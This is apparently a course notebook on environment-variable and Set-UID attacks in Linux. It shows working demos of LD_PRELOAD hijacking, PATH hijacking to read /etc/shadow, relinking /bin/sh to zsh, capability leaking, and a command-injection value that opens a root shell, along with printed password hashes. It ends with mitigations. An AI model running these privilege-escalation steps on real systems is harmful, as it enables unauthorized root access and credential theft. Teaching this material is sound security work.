# Environment Variables and SetUID Programs: Attacks and Mitigations

## Environment Variables Pitfalls
- there's no known inherent vulnerability on environment variables
- like many features of OSes, they just provide a convenient way to manage configuration settings

### Security Risks
- env vars are accessible by processes on the system; means that sensitive information stored in them such as API keys or database credentials could potentially be exposed if proper security measures not in place

### Accidental Overwriting
- since env vars are dynamic and can be changed at runtime, there's a risk of accidental overwriting
- a misconfigured or malicious process might alter the values of critical variables, leading to unexpected behavior of applications

### Debugging Challenges
- in complex systems, tracing the source of a problem can be difficult

### Dependency on External Configuration
- overreliance on environment variables for configuration settings can make it challenging to manage and version configurations, esp. in larger projects
- changes in configruations may require updates in multiple places, leading to potentital inconsistencies

### Lack of Encryption
- environment variables are typically stored in plaintext
- sensitive information if stored as env vars can be exposed

### Limited Access Control
- access control on env variables are ususally limited
- it can be challenging to ensure proper access control to preven unauthorized access and modification to sensitive variables

### Hard-Coding Pitfall
- care should be taken to access the hard-coded env vars in programs
- what if the values of the variables are modified by the malicios programs and processes?

## Attack Surface caused by Environment Variables

- attack surfaces on environment variables can be broadly categorized into two groups: Linker/Loader and Application

#### Linker/Loader

- Linker is a special program used to find the external library functions used by a program
- usually out of developers controls
- Linker in most OSes use env variables to find where the libraries are
- provides opporunity for malicious users to link "malicious" libraries and code

#### Application category

- divided into 3 sub categories

#### Library

- most programs invoke api functions from external libraries
- the external libraries may not have been developed for privileged programs
    - may not santize the values of the environment variables
    
#### External program

- a program may invoke external program(s) for certain functionalities
    - sending emails, printing, reading network data, etc.
- when the program is invoked, its code may run with the calling process's privilege
- the external program may in turn use env variables expanding the attack surface and increasing the risks

#### Application code

- a program may implicitly use environment variables in its code
- developers may have misunderstanding and wrong assumptions of how environment variables get passed into the program
- these assumptions may lead into using unsanitized env variables leading to vulnerable code

### Attacks via Dynamic Linker

- before the program executes, **linker** program links the code with the system's libraries
- linking can be done in two places: statically and dynamically
- let's look into each type of linking

#### Static Linking
- links the program code and librariy code into a single binary without relying on the external library code
- the executable is self-contained
    - it has everything it needs in the same program file
    
- we can specify `-static` option in **gcc** and **g++** compilers for static linking
- program file becomes huge (many magnitudes bigger compared to dynamic linking)
- takes more memory to load the whole program into RAM
- if the library has bug/security holes, your application program will be shipped with the bugs and holes

#### Dynamic Linking

- link the external libraries during program execution
- by default compilers perform dynamic linking
- program files are much smaller
- many program share the same **shared** library loaded by OS
    - in `*nix` systems, these files are `.so` extension (Shared Object)
    - in Windows, these files are called DLLs (Dynamic link libraries)
- we can use `ldd` command to see what shared libraries a program depends on
- in `*nix` systems, ELF (Executable and Linkable File) contains `.interp` section that specifies the name of the linker
    - the linker itself is a shared library (`ld-linux.so`, `ld.so`)
- let's see a `hello.cpp` program to demonstrate the differences

In [1]:
%pwd

'/home/kali/projects/SoftwareSecurity'

In [1]:
%cd demos/envvars

/home/kali/projects/SoftwareSecurity/demos/envvars


In [3]:
! cat hello.cpp

#include <cstdio>

int main() {
    printf("Hello World!\n");
    return 0;
}

In [4]:
# compile with static linking
! g++ -static -o hello_static hello.cpp

In [5]:
# Note the size of the binary
! ls -al hello_static

-rwxr-xr-x 1 kali kali 733568 Feb  5 17:43 hello_static


In [6]:
! ./hello_static

Hello World!


In [7]:
# let's see what ldd program says
! ldd hello_static

	not a dynamic executable


In [8]:
# compile for dynamic linking
! g++ -o hello_dynamic hello.cpp

In [10]:
# let's see the size
! ls -al hello_dynamic

-rwxr-xr-x 1 kali kali 15952 Feb  5 17:45 hello_dynamic


In [9]:
! ./hello_dynamic

Hello World!


In [11]:
! ldd hello_dynamic

	linux-vdso.so.1 (0x00007fff607ec000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd221061000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fd221264000)


## Dynamic Linking Exploitation

- missing code is decided during run-time
- missing libraries are search in default path provided by ENV variables such as **LD_PRELOAD**, **LD_LIBRARY_PATH**
- these variable are not set by default
- however, they can be set and exported so the programs can use them
- since we can't set ENV variables from Jupyter Notebooks, we'll use a Terminal
- the demo programs used are: `dynamic_vuln.cpp` and `mysleep.c`
- dynamic library must be written in C not in C++

In [14]:
! printenv PATH

/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games


In [15]:
# let's see LD_PRELOAD varialbe
! printenv LD_PRELOAD

In [16]:
# let's see LD_LIBRARY_PATH
! printenv LD_LIBRARY_PATH

In [17]:
! cat dynamic_vuln.cpp

#include <unistd.h>
#include <cstdio>

int main() {
    printf("I'm sleeping for 2 seconds.\n");
    sleep(2);
    printf("I'm awake now...");
    return 0;
}

In [39]:
! g++ -o dynamic_vuln dynamic_vuln.cpp

In [40]:
! ./dynamic_vuln

I'm sleeping for 2 seconds.
I'm awake now...

In [41]:
! ldd dynamic_vuln

	linux-vdso.so.1 (0x00007ffe6cbb7000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb55d068000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fb55d26b000)


In [82]:
! cat mysleep.c

#include <stdio.h>

unsigned int sleep(unsigned int seconds);

unsigned int sleep(unsigned int s) {
    printf("Sorry I'm not sleeping...\n");
    return 0;
}


In [84]:
# let's just compile into object code and not build it as an executable
# creates sleep.o file
! gcc -c mysleep.c

In [86]:
# let's check the file
! ls -al mysleep.o

-rw-r--r-- 1 kali kali 1392 Feb  5 20:50 mysleep.o


In [87]:
# create a shared library from mysleep.o object file
! gcc -shared -o mysleeplib.1.0.0.so mysleep.o

In [88]:
! ls -al mysleeplib.1.0.0.so

-rwxr-xr-x 1 kali kali 15376 Feb  5 20:50 mysleeplib.1.0.0.so


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ export LD_LIBRARY_PATH=$PWD            
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ export LD_PRELOAD=./mysleeplib.1.0.0.so
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ ./dynamic_vuln
I'm sleeping for 2 seconds.
Sorry I'm not sleeping...
I'm awake now...                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ ldd dynamic_vuln
        linux-vdso.so.1 (0x00007ffff9bf7000)
        ./mysleeplib.1.0.0.so (0x00007fa30c0d9000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa30bedd000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fa30c0e5000)
```

### Set-UID Programs

- the above attack will NOT work for Set-UID programs
- verification is left as an exercise

## PATH Environment Variable Vulnerabilty

- if your program uses system call to an external program that relies on PATH variable to lookup its path, it is vulnerable!
- `today.cpp` program in `demos/envexploit` folder uses `system` API to rely on PATH variable to call date function
- can we force this program to read `/etc/passwd` file without modifying the program itself?

In [4]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/envexploit


In [5]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 17 kali kali  4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali   146 Jan 18 17:51 date
-rwsr-sr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 27 22:37 today.cpp


In [6]:
! cat today.cpp

// Wrapper program for bash date program

#include <cstdio>
#include <cstring>
#include <cstdlib>

using namespace std;

int main(int argc, char* argv[]) {
    printf("Today is: ");
    // must flush stdout so system call's result is printed after
    fflush(stdout); 
    system("date");
    return 0;
}

In [7]:
! cat  Makefile

COMPILER = g++

COMPILER_FLAGS = -g -Wall -std=c++17

# the build target executable program name of your choice
PROGRAM_NAME = today

CPP_FILES = today.cpp

build:
	$(COMPILER) $(COMPILER_FLAGS) $(CPP_FILES) -o $(PROGRAM_NAME)

# make clean rule
# delete object and binary files
clean:
	rm -f $(PROGRAM_NAME) *.o


In [8]:
! make

g++ -g -Wall -std=c++17 today.cpp -o today


In [9]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 28 16:00 .
drwxr-xr-x 17 kali kali  4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali   146 Jan 18 17:51 date
-rwxr-xr-x  1 kali kali 22632 Jan 28 16:00 today
-rw-r--r--  1 kali kali   304 Jan 27 22:37 today.cpp


In [10]:
! ./today

Today is: Sun Jan 28 16:00:38 EST 2024


In [11]:
! which date

/usr/bin/date


## Exploitation of PATH env variable

- today program uses `system` API to call `date` program
- system finds `date` program by search the `PATH` env variable which is in `/usr/bin/date`
- create your own "date" program; that does whatever you want it to do
- update the PATH so it finds your "date" program before finding system's `/usr/bin/date`
- you can write your program in whatever language of your choice
    - bash script is the easiest in this case
- see `date` script in the `demo/envexploit` folder
- make the program executable
- update the PATH from Terminal and run the today program

In [12]:
! cat date

#! /bin/sh

# date program that reads /etc/passwd file

if cat /etc/passwd; then
    echo "Woohoo I got it!"
else
    echo "Command failed :("
fi


In [13]:
! chmod +x date

In [14]:
! ls -al date

-rwxr-xr-x 1 kali kali 146 Jan 18 17:51 date


In [15]:
! ./date

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:106:MySQL Server,,,:/

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ export PATH=$PWD:$PATH 
                                                                                                     
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ echo $PATH            
/home/kali/projects/SoftwareSecurity/demos/envexploit:/home/kali:/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/kali//home/kali/bin

(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

kali:x:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
bob:x:1001:1001:,,,:/home/bob:/bin/bash
Woohoo I got it!
```

## Direct Usage of Env Vars in Application Code

- if ENV variables are accessed and used as part of the application code, it may be vulnerable
- let's see `print_pwd.cpp` do demo the vulnerability and its exploitation
- the program prints current working directory, similar to `pwd` program

In [98]:
! cat print_pwd.cpp

#include <cstdio>
#include <cstdlib>

int main() {
    char buffer[100]; // this may be vulnerable!
    char *ptr;
    ptr = getenv("PWD");
    if (ptr != NULL){
        sprintf(buffer, "Current working directory is: %s", ptr);
        printf("%s\n", buffer);
    }
    return 0;
}

In [99]:
! g++ -o print_pwd print_pwd.cpp

In [100]:
! ./print_pwd

Current working directory is: /home/kali/projects/SoftwareSecurity/demos/envvars


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ pwd
/home/kali/projects/SoftwareSecurity/demos/envvars
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ echo $PWD                              
/home/kali/projects/SoftwareSecurity/demos/envvars
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envvars]
└─$ cd ..                                  
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ echo $PWD     
/home/kali/projects/SoftwareSecurity/demos

(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ ./envvars/print_pwd
Current working directory is: /home/kali/projects/SoftwareSecurity/demos
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ PWD=abc               
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ ./envvars/print_pwd
Current working directory is: abc
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ export PWD="Whatever you wish..."      
                                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos]
└─$ ./envvars/print_pwd
Current working directory is: Whatever you wish...
```

## Attack Surfaces of Set-UID Programs

- the impact of exploitation of set-uid programs can be severe
- can compromise all 3 CIA triads
    - what are CIA triads?

![Attack Surfaces](./media/setuid-attacks.png)

### Attacks Via User Inputs

#### Buffer Overflow
- covered in depth later in Bufffer Overflow chapters
- overflow a buffer to run arbitrary malicious code

#### Format String Vulnerability
- covered in depth later in Format String chapter
- change program behavior using user inputs for format strings

### Attacks via System Inputs
- covered in Race Condition chapter

### Attacks via Environment Variables
- if the program (e.g., today program) is set-uid, you can exploit it to execute any program as the owner of the program
- if the program is root, anyone who can run this program gains root's privileges during its execution
    - esentially, it typically escalates users' privileges and that can have serious consequences
- `system(command)` is a wrapper for `/bin/sh`
    - it is invoked as `/bin/sh -c command`
    - i.e., it invokes `/bin/sh` and and asks the shell to execute the command
- `system()` passes the env vars of calling process to the new program `/bin/sh`
- in newer version of Linux (Ubuntu 20.04 and Kali 2023, e.g.), `/bin/sh` is actually a symbolic link pointing to `/bin/dash`
- `/bin/dash` has a conutermeasure that prevents itself from being executed in a Set-UID process
    - if dash detects that it is being executed in a Set-UID prorcess, it immediately changes the effective User ID to the process's real ID -- essentially dropping the privilege
- if we update the `date` script and try to read priviledged `/etc/shadow` file, it'll fail!
- we can however update the softlink  `/bin/sh` to point to `/bin/zsh` which doesn't have the countermeasure

In [10]:
! ls -al /bin/sh

lrwxrwxrwx 1 root root 4 Jun 21  2023 /bin/sh -> dash


In [4]:
! echo kali | sudo -S chown root today

[sudo] password for kali: 

In [5]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 15 kali kali  4096 Jan 18 13:56 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali    97 Jan 18 14:10 date
-rwxr-xr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 18 13:51 today.cpp


In [7]:
! echo kali | sudo -S chmod +s today

[sudo] password for kali: 

In [8]:
! ls -al

total 44
drwxr-xr-x  2 kali kali  4096 Jan 18 14:14 .
drwxr-xr-x 15 kali kali  4096 Jan 18 13:56 ..
-rw-r--r--  1 kali kali   313 Jan 18 13:48 Makefile
-rwxr-xr-x  1 kali kali    97 Jan 18 14:10 date
-rwsr-sr-x  1 root kali 22632 Jan 18 13:57 today
-rw-r--r--  1 kali kali   304 Jan 18 13:51 today.cpp


In [16]:
! cat date 

#! /bin/sh

# date program that reads /etc/passwd file

if cat /etc/shadow; then
    echo "Woohoo I got it!"
else
    echo "Command failed :("
fi


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: cat: /etc/shadow: Permission denied
Command failed :(
```

In [13]:
# let's create a soft link /bin/sh pointing to /bin/zsh
! echo kali | sudo -S ln -sf /bin/zsh /bin/sh

[sudo] password for kali: 

In [14]:
! ls -al /bin/sh

lrwxrwxrwx 1 root root 8 Jan 18 17:46 /bin/sh -> /bin/zsh


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/envexploit]
└─$ ./today
Today is: root:!:19662:0:99999:7:::
...
kali:$y$j9T$K/agt9PK0eYweoRVbd9yK0$6BUblkWhNb00ZJWw7nYm0fZL1bpF.1BAs5h0CRF4xj2:19662:0:99999:7:::
bob:$y$j9T$KoIINXes24L0Z2qTeAdEX0$aNnlXFBUXuSZrsiCKPFPCxMIz/KNoz0gIzFnOppN2F1:19739:0:99999:7:::
Woohoo I got it!
```

## Capability Leaking

- in some cases, privileged programs downgrade themselves during execution
- E.g., **su** program

### su
- su is a privileged set-uid program
- allows user to switch to another user (say user1 to user2)
- program starts with EUID as root and RUID as user1
- after password verification, both EUID and RUID becomes user2's (via privilege downgrading)
- such programs may lead to capability leaking if not implemented correctly
    - programs may not clean up privileged capabilities before downgrading

### Attacks via Capability Leaking
- let's look at an example program provided in `demos/capleak/` folder
- program opens a file in `/etc` in **write/append** mode
- program must be root setuid to be able to write to the `/etc` folder
- program downgrades the privilege with the RUID of the user
- it then executes `/bin/sh`
- conviniently, file descriptor value is also printed
- run the program from the Terminal to get the shell 

In [18]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/envexploit


In [19]:
%cd ../capleak

/home/kali/projects/SoftwareSecurity/demos/capleak


In [21]:
! ls -al

total 16
drwxr-xr-x  2 kali kali 4096 Jan 18 22:32 .
drwxr-xr-x 16 kali kali 4096 Jan 18 18:00 ..
-rw-r--r--  1 kali kali  394 Jan 18 22:10 Makefile
-rw-r--r--  1 kali kali  721 Jan 18 22:13 capleak.cpp


In [24]:
! cat capleak.cpp

// https://github.com/seed-labs/seed-labs/blob/master/category-software/Environment_Variable_and_SetUID/Labsetup/cap_leak.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

using namespace std;

int main(int argc, char* argv[]) {
    int fd;
    char *v[2];
    
    fd = open("/etc/xyz", O_RDWR | O_APPEND | O_CREAT); 
    if (fd == -1) {
        printf("Failed to open /etc/xyz\n");
        exit(1);
    }
    // print out the file descriptor value
    printf("fd is %d\n", fd);
    // FIXME - close the file
    // close(fd);
    // downgrade the privilege my making the effective uid the same as the real uid
    setuid(getuid());
    // execute /bin/sh
    v[0] = "/bin/sh"; v[1] = 0;
    execve(v[0], v, 0);
    return 0;
}


In [22]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -std=c++17 capleak.cpp -o capleak
capleak.cpp: In function ‘int main(int, char**)’:
capleak.cpp:24:12: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings]8;;]
   24 |     v[0] = "/bin/sh"; v[1] = 0;
      |            ^~~~~~~~~
sudo chown root capleak
sudo chmod +s capleak


In [23]:
! ls -al

total 48
drwxr-xr-x  2 kali kali  4096 Jan 18 22:33 .
drwxr-xr-x 16 kali kali  4096 Jan 18 18:00 ..
-rw-r--r--  1 kali kali   394 Jan 18 22:10 Makefile
-rwsr-sr-x  1 root root 30384 Jan 18 22:33 capleak
-rw-r--r--  1 kali kali   721 Jan 18 22:13 capleak.cpp


```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/capleak]
└─$ ./capleak 
fout is 3
$ echo ABCDEF                                                                                              
ABCDEF
$ echo ABCDEF >& 3                                                                                       
$ cat /etc/xyz                                                                                             
aaa
aaaa
ABCDEF
$ exit
```

## Fix the Vulnerability

- close/destroy the file description before dropping the privelege

## Capbility Leaking in OS X - Case Study

- OS X Yosemite found vulnerable to privilege escalation attack related to capability leaking in July 2015 ( OS X 10.10 )
- added features to dynamic linker dyld 
    - DYLD_PRINT_TO_FILE environment variable
- the dynamic linker can open any file, so for root-owned Set-UID programs, it runs with root privileges 
- the dynamic linker dyld, does not close the file leading to capability leaking vulnerability


## Command Injection

- programs' often takes input from users
- if the users' input is not validated and sanitized, data can be converted into command name
    - data is then executed as command
- SQL injection is a type of command injection attack very common in SQL-driven web applications
- see `catall.cpp` file in `demos/injection` folder

In [25]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/capleak


In [26]:
%cd ../injection

/home/kali/projects/SoftwareSecurity/demos/injection


In [27]:
! ls -al

total 12
drwxr-xr-x  2 kali kali 4096 Jan 19 00:25 .
drwxr-xr-x 17 kali kali 4096 Jan 19 00:25 ..
-rw-r--r--  1 kali kali  393 Jan 19 00:27 Makefile
-rw-r--r--  1 kali kali    0 Jan 19 00:24 catall.c


In [29]:
! cat catall.cpp

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
  char *v[3];
  char *command;

  if(argc < 2) {
    printf("Usage: calall <file_path>.\n");
    return 1;
  }

  v[0] = "/bin/cat"; v[1] = argv[1]; v[2] = NULL;

  command = malloc(strlen(v[0]) + strlen(v[1]) + 2);
  sprintf(command, "%s %s", v[0], v[1]);

  // Use only one of the followings.
  system(command);
  // execve(v[0], v, NULL);

  return 0 ;
}

In [32]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -std=c++17 catall.cpp -o catall
catall.cpp: In function ‘int main(int, char**)’:
catall.cpp:16:10: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings]8;;]
   16 |   v[0] = "/bin/cat"; v[1] = argv[1]; v[2] = NULL;
      |          ^~~~~~~~~~
sudo chown root catall
sudo chmod +s catall


- you must use the "quotations" around the commands ";" separated arguments
- quotes ensure everything is passed as a single argument to the vulnurable program
- note, injecting /bin/zsh gives root but injecting  /bin/sh doesn not 

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; cat /etc/shadow"
/bin/cat: adf: No such file or directory
root:!:19662:0:99999:7:::
...
kali:$y$j9T$K/agt9PK0eYweoRVbd9yK0$6BUblkWhNb00ZJWw7nYm0fZL1bpF.1BAs5h0CRF4xj2:19662:0:99999:7:::
bob:$y$j9T$KoIINXes24L0Z2qTeAdEX0$aNnlXFBUXuSZrsiCKPFPCxMIz/KNoz0gIzFnOppN2F1:19739:0:99999:7::

(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; /bin/bash"
/bin/cat: adf: No such file or directory
bash-5.2$ whoami
kali
bash-5.2$ ./catall "asdf; /bin/bash"
/bin/cat: asdf: No such file or directory
bash-5.2$ exit
exit
bash-5.2$ exit
exit
                                                                                                                                                                                                                                                                                         
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/injection]
└─$ ./catall "adf; /bin/zsh" 
/bin/cat: adf: No such file or directory
x86_64-conda-linux-gnu# whoami
root
x86_64-conda-linux-gnu# id
uid=1000(kali) gid=1000(kali) euid=0(root) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),105(netdev),117(wireshark),120(bluetooth),133(scanner),140(kaboxer)
x86_64-conda-linux-gnu# 
```

## Mitigation

- avoid `system` call if possible
- use `execve` properly instead of `system` when executing system commands from C/C++ programs
- `execve` allows you to separate the command from the input data
- `exec` family of function is lower-level compared to system and allows for granular control on how the program should be executed
- allows you to pass your own environment variables in the third argument
- replaces the current process image with a new one, executing the specified program
- you need to provide full path to the executable and explictly pass an array of arguments
    - preventing the ENV VARS overriding attack 
- not all `exec` family funcions behave similarly
    - `execlp(), execvp(), execvpe()` duplicate the actions of the shell
    - these functions can be attacked using the PATH Environment Variable
    
```bash
execve(command_name, input_data_argument, env_variables);
```

- patch the `catall.cpp` program and try to exploit it again
- see `demos/injection/secure` folder for the secure version of `cat_all` program
- compile and try the command injection again...

In [34]:
! man execve

execve(2)                     System Calls Manual                    execve(2)

NAME
       execve - execute program

LIBRARY
       Standard C library (libc, -lc)

SYNOPSIS
       #include <unistd.h>

       int execve(const char *pathname, char *const _Nullable argv[],
                  char *const _Nullable envp[]);

DESCRIPTION
       execve() executes the program referred to by pathname.  This causes the
       program  that  is  currently being run by the calling process to be re‐
       placed with a new program, with  newly  initialized  stack,  heap,  and
       (initialized and uninitialized) data segments.

       pathname  must be either a binary executable, or a script starting with
       a line of the form:

           #!interpreter [optional-arg]

       For details of the latter case, see "Interpreter scripts" below.

       argv is an array of pointers to strings passed to the  new  program  as
       its  command-line arguments.  By convention, the first of these str

```bash
(base) ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/injection/secure]
└─$ ./secure_catall "adfasdf; ls -al"
/bin/cat: 'adfasdf; ls -al': No such file or directory
  
  
(base) ┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/injection/secure]
└─$ ./secure_catall "adfasdf; /bin/cat /etc/passwd"
/bin/cat: 'adfasdf; /bin/cat /etc/passwd': No such file or directory
```

## Invoking External Commands in Other Languages

- risks of invoking external commands or command injection is not limited to C/C++ programs
- goal is to avoid problems similar to those caused by the system() function
- many languages allow system API, such as PHP, Perl, Python, etc.

## Mitigating Attacks on SetUID Programs and Env Variables

### Sanitize Untrusted Data

- take extra precution on using untrested data
- always sanitize user/untrusted data before using them in the application

### Use Secure API Functions and Library

- use `secure_getenv()` instead of `getenv()`

### Use Principle of Isolation
    
- don't mix code with data
- various attacks such as system() code execution, XSS (Cross-site scripting), SQL Injection, Buffer Overflows are consequences of mixing code with data

### Use Principle of Least Privilege

- a privileged program should be given the just the right amount of power required to perform its tasks
- disable the privileges (temporarily or permenanently) when a privileged program doesn't need those
- in Linux, seteuid() and setuid() can be used to downgrade/upgrade privilege when needed
    - different OSes may provide different APIs
    
### Use Principle of Cleanup After

- discard the resources after they're done being used
- free/release memory used by dynamic variables created using **new**, **malac**, etc.
- close files and resources after their usages
